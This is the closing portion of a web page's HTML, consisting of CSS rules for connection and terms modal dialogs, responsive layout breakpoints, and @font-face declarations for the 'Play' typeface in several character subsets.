  }
  
  .modal-connect__body-content-confirm-support:hover {
     text-decoration: underline;
  }
  
  .modal-connect__body-content-stats {
     display: flex;
     gap: 15px;
     align-items: center;
     flex-direction: column;
     color: #C8433C;
     font-weight: 400;
     font-size: 16px;
     margin-bottom: 40px;
  }
  
  .modal-connect__body-content-stats--success {
     color: #65924D;
  }
  
  .modal-connect__body-content-stats-item {
     display: flex;
     gap: 10px;
     align-items: center;
  }
  
  .modal-terms {
     position: fixed;
     top: 0;
     left: 0;
     width: 100%;
     height: 100%;
     z-index: 10;
     padding: 20px 0px;
     background-color: rgba(0, 0, 0, .5);
     overflow-y: scroll;
     transform: translateY(-150%);
  }
  
  .modal-terms.open {
     animation: popupOpen 1s forwards;
  }
  
  .modal-terms__body {
     background: #222222;
     color: white;
     padding: 40px;
     max-width: 900px;
     margin: 0 auto;
     border-radius: 10px;
     display: flex;
     flex-direction: column;
     gap: 20px;
     font-size: 16px;
     line-height: 20px;
  }
  
  .modal-terms__body h2 {
     margin-bottom: 10px;
     font-size: 28px;
     line-height: 32px;
  }
  
  .modal-terms__body ul li {
     margin-bottom: 5px;
  }
  
  .modal-terms__body ul li:last-child {
     margin-bottom: 0;
  }
  
  @media (max-width: 1000px) {
     .game__inner {
        grid-template-columns: 1fr;
        justify-items: center;
     }
  
     .game__card {
        max-width: 600px;
        width: 100%;
     }
  
     .advantage__inner {
        grid-template-columns: 1fr 1fr;
     }
  }
  
  @media (max-width: 790px) {
     .brands__items-inner {
        grid-template-columns: 1fr 1fr;
     }
  
     .brands__arrow {
        display: none;
     }
  }
  
  @media (max-width: 768px) {
     .intro__title, .game__title, .try__title {
        font-size: 36px;
     }
  
     .try__list {
        font-size: 16px;
        line-height: 20px;
     }
  
     .modal-connect {
        padding-top: 0;
     }
  
     .modal-connect__body-header {
        background-color: #000;
     }
  }
  
  @media (max-width: 470px) {
     .intro__title, .game__title, .try__title {
        font-size: 28px;
        line-height: 32px;
     }
  
  }
  
  @media (max-width: 400px) {
     .advantage__inner {
        grid-template-columns: 1fr;
     }
  }</style>
<style>/* cyrillic-ext */
  @font-face {
    font-family: 'Play';
    font-style: normal;
    font-weight: 400;
    font-display: swap;
    src: url(fonts/6aez4K2oVqwIvtg2H68T.woff2) format('woff2');
    unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;
  }
  /* cyrillic */
  @font-face {
    font-family: 'Play';
    font-style: normal;
    font-weight: 400;
    font-display: swap;
    src: url(fonts/6aez4K2oVqwIvtE2H68T.woff2) format('woff2');
    unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
  }
  /* greek */
  @font-face {
    font-family: 'Play';
    font-style: normal;
    font-weight: 400;
    font-display: swap;
    src: url(fonts/6aez4K2oVqwIvtY2H68T.woff2) format('woff2');
    unicode-range: U+0370-03FF;
  }
  /* vietnamese */
  @font-face {
    font-family: 'Play';
    font-style: normal;
    font-weight: 400;
    font-display: swap;
    src: url(fonts/6aez4K2oVqwIvto2H68T.woff2) format('woff2');
    unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;
  }
  /* latin-ext */
  @font-face {
    font-family: 'Play';
    font-style: normal;
    font-weight: 400;
    font-display: swap;
    src: url(fonts/6aez4K2oVqwIvts2H68T.woff2) format('woff2');
    unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
  }
  /* latin */
  @font-face {
    font-family: 'Play';
    font-style: normal;
    font-weight: 400;
    font-display: swap;
    src: url(fonts/6aez4K2oVqwIvtU2Hw.woff2) format('woff2');
    unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
  }
  /* cyrillic-ext */
  @font-face {
    font-family: 'Play';
    font-style: normal;
    font-weight: 700;
    font-display: swap;
    src: url(fonts/6ae84K2oVqwItm4TCp0y2knT.woff2) format('woff2');
    unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;
  }
  /* cyrillic */
  @font-face {
    font-family: 'Play';
    font-style: normal;
    font-weight: 700;
    font-display: swap;
    src: url(fonts/6ae84K2oVqwItm4TCpQy2knT.woff2) format('woff2');
    unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;
  }
  /* greek */
  @font-face {
    font-family: 'Play';
    font-style: normal;
    font-weight: 700;
    font-display: swap;
    src: url(fonts/6ae84K2oVqwItm4TCpMy2knT.woff2) format('woff2');
    unicode-range: U+0370-03FF;
  }
  /* vietnamese */
  @font-face {
    font-family: 'Play';
    font-style: normal;
    font-weight: 700;
    font-display: swap;
    src: url(fonts/6ae84K2oVqwItm4TCp8y2knT.woff2) format('woff2');
    unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;
  }
  /* latin-ext */
  @font-face {
    font-family: 'Play';
    font-style: normal;
    font-weight: 700;
    font-display: swap;
    src: url(fonts/6ae84K2oVqwItm4TCp4y2knT.woff2) format('woff2');
    unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20CF, U+2113, U+2C60-2C7F, U+A720-A7FF;
  }
  /* latin */
  @font-face {
    font-family: 'Play';
    font-style: normal;
    font-weight: 700;
    font-display: swap;
    src: url(fonts/6ae84K2oVqwItm4TCpAy2g.woff2) format('woff2');
    unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+2074, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;
  }
  </style>

</body></html>